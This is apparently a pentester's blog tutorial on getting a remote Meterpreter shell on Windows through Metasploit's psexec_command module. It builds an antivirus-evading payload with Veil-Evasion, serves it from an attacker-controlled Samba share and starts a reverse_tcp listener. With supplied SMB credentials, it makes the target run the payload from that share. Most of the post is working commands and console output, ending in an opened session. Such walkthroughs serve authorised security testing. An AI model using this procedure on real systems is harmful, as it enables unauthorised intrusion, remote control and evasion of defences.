Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:
- Metasploit psexec
- Metasploit psexec_psh
- Windows psexec executable
- Impacket psexec python script
- pth-winexe
- pth-wmis
- smbexec
- Veil-Catapult
All of these tools work and have their strengths and weaknesses. I’m going to share one more method that I recently discovered, using the Metasploit “psexec_command” module, created by Royce Davis (@r3dy__), from Accuvant LABS.
First, we need to create an AV-safe executable to deploy to our target. If you haven’t checked it out yet, Veil-Evasion is one the easiest ways to create AV-safe executables. After we have an executable, we simply create an SMB share for our targets to access.
Add this section to “/etc/samba/smb.conf”:
[payloads$] comment = Payloads path = /root/veil-output/compiled browseable = yes read only = yes guest ok = yes public = yes
In Kali Linux, Samba is not running by default, so we need to start it:
root@kali:~# service samba start [ ok ] Starting Samba daemons: nmbd smbd.
Next, we startup Metasploit and open a listener:
root@kali:~# msfconsole IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|\`.""'. II 6. .P : .' / | \ `. : II 'T;. .;P' '.' / | \ `.' II 'T; ;P' `. / | \ .' IIIIII 'YvP' `-.__|__.-' I love shells --egypt Large pentest? List, sort, group, tag and search your hosts and services in Metasploit Pro -- type 'go_pro' to launch it now. =[ metasploit v4.9.2-2014043001 [core:4.9 api:1.0] ] + -- --=[ 1355 exploits - 830 auxiliary - 237 post ] + -- --=[ 335 payloads - 35 encoders - 8 nops ] msf> use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 0.0.0.0 LHOST => 0.0.0.0 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j -z [*] Exploit running as background job. [*] Started reverse handler on 0.0.0.0:443 msf exploit(handler) > [*] Starting the payload handler...
Now, we setup “psexec_command” and configure the module to run the executable payload directly from our SMB share:
msf exploit(handler) > use auxiliary/admin/smb/psexec_command msf auxiliary(psexec_command) > set COMMAND start \\\\192.168.81.196\\payloads$\\TrustedSec39.exe COMMAND => start \\192.168.81.196\payloads$\TrustedSec39.exe msf auxiliary(psexec_command) > set RHOSTS 192.168.81.202 RHOSTS => 192.168.81.202 msf auxiliary(psexec_command) > set SMBPass OMGDontPwnMe! SMBPass => OMGDontPwnMe! msf auxiliary(psexec_command) > set SMBUser TrustedSec SMBUser => TrustedSec
Pull the trigger and cross your fingers:
msf auxiliary(psexec_command) > exploit [*] 192.168.81.202:445 - Executing the command... [*] Sending stage (769536 bytes) to 192.168.81.202 [*] 192.168.81.202:445 - Getting the command output... [*] 192.168.81.202:445 - Command finished with no output [*] 192.168.81.202:445 - Executing cleanup... [-] 192.168.81.202:445 - Unable to cleanup \WINDOWS\Temp\FtHThcznCVkttXJy.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0) [-] 192.168.81.202:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(psexec_command) > [*] Meterpreter session 1 opened (192.168.81.196:443 -> 192.168.81.202:14336) at 2014-05-06 09:33:39 -0400
It does leave a randomly named txt file in the “Windows\temp” directory that you need to cleanup manually, but that’s it! You can also point RHOSTS to a text file of multiple remote hosts to target.
MOAR SHELLZ!